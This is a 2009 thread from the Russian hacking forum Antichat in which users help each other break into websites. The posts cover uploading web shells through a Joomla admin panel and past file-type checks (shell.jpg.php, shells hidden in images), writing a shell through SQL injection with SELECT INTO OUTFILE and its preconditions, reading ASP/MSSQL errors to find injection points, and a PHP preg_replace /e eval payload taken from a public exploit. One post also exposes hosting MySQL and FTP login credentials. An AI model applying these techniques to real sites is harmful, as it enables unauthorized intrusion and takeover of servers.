ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.05.2009, 00:01
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме:
418218
Репутация:
59
|
|
Сообщение от oRb
bug1z, то, что ты нашел называется репозиторий. И это не уязвимость.
Уязвимосто-не уязвимость а некоторые свединия о системе выдаёт...
|
|
|
10.05.2009, 00:06
|
|
Познающий
Регистрация: 21.12.2008
Сообщений: 93
Провел на форуме:
391983
Репутация:
39
|
|
Сообщение от bug1z
Вот что у меня получилось выудить у службы поддержки:
То есть как мне показалось там нету полного интерфейса пхпмайадмина, но это косвенно...
Пока искал твой пхпмайадмин в гугле наткнулся на интересый поддомет этого хостинга:
Код:
http://mirror.mirohost.net/
Что я там обнаружил, от туда можно скачать phpmyadmin oO
Код:
http://mirror.mirohost.net/ubuntu/pool/universe/p/phpmyadmin/
А также различные конфиги похопе, но это если интересует... вот акк на тестовый период и там они дают полную версию так что и на платку по идее должна быть полная версия phpmyadmin
Данные для работы с базой данных MySQL :
mySQL server: localhost
mySQL database: test3serv316
mySQL login: u_test3serv316
mySQL password: RqJt6A0p
phpMyAdmin: http://test3servdb.mirohost.net
|
|
|
|
10.05.2009, 00:12
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме:
418218
Репутация:
59
|
|
Посмотри на тестовый период дают phpmyadmin должен же быть и на платник нормальный phpmyadmin
FTP server: ftp://test3serv.mirohost.net
FTP login: test3serv316
FTP password: RqJt6A0p
Плфтный пхпмайадмин скорее всего даётся на определённый ip адрес, по крайней мерее так на большенстве хостингов.
Например так:
https://хх.ххх.хх.ххх:хххх
|
|
|
|
10.05.2009, 01:00
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
2 bug1z
то есть , по другому никак ?
Я уже пробовал так (shell.jpg.php )
Возможно есть другой способ ?
PS: У кого есть html shell ?
|
|
|
|
10.05.2009, 03:11
|
|
Познающий
Регистрация: 31.01.2008
Сообщений: 46
Провел на форуме:
124111
Репутация:
8
|
|
Сообщение от geezer.code
это джумла(joomla)
после того как сбрутишь пасс админа логинишься в админку
адмника тут - site.com/administrator/
а дальше через установку модулей и компонентов, или через языки.
также если установлен компонент joomla_extplorer, можно и через него.
Пасс админа уже есть, но директория site.com/administrator/ закрыта файлом .htaccess, поэтому и спрашиваю про sql-inj
|
|
|
|
10.05.2009, 09:52
|
|
Новичок
Регистрация: 17.03.2008
Сообщений: 23
Провел на форуме:
52106
Репутация:
-2
|
|
при воде ковычек выдает ошибку
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/index.asp, line 21
|
|
|
|
10.05.2009, 10:24
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от Rashid
Пасс админа уже есть, но директория site.com/administrator/ закрыта файлом .htaccess, поэтому и спрашиваю про sql-inj
чтобы залить шелл только через sql-inj, нужно
file_priv = Y
magic_quotes_gpc=OFF
иметь директорию,видимую из вэба, на запись.
тогда шелл заливается запросом select into outfile.
|
|
|
|
10.05.2009, 12:22
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме:
418218
Репутация:
59
|
|
Сообщение от Saiga
2 bug1z
то есть , по другому никак ?
Я уже пробовал так (shell.jpg.php )
Возможно есть другой способ ?
PS: У кого есть html shell ?
Почему же, есть и другие способы, например запихнуть шелл в картинку, об этом можешь почитать здесь(юзай поиск  )
Так же посмотри, нету ли в админке ф-и для добавления формата загружаемых файлов...
Если и эти способы не прокатят, зна не судьба залить через админку(ИМХО).
В этом случае ищи баг на сайте с помощю которого есть возможность залить шелл, это например SQL inj или php include, с их помощю можно будет залить шелл(ЕСЛИ ПОВЕЗЁТ!!!)
|
|
|
|
10.05.2009, 13:30
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
при воде ковычек выдает ошибку
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/index.asp, line 21
Это скорее всего MSSQL и тута не чего не попишеш... хотя хз
Ищи ошибку вот такого вида
Код:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near 'NO'.
/prodDetails.asp, line 1282
И смотри >>Здесь<<
Последний раз редактировалось farex; 10.05.2009 в 13:32..
|
|
|
|
10.05.2009, 15:14
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Вообщем есть сплойт.
Код:
http://milw0rm.com/exploits/4851
Даже если забиваю этого кусок кода на локальхост
PHP код:
$source = htmlspecialchars($text);
$source = preg_replace(
'/<!--(.*?)-->/es',
'"<span style=\"color: ".$options["color"]["comment"].";\"><!--".
str_replace("<","<<!-- -->",
str_replace("=","=<!-- -->",
"$1")).
"--></span>"',
$source);
и тестю
Код:
html.php?text=%3C!--{${eval($s)}}--%3E&s=phpinfo();
И собсна он не выполняет phpinfo...Вопрос почему?...в регурялках я не разбираюсь пока....в чём соль? версия php? |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
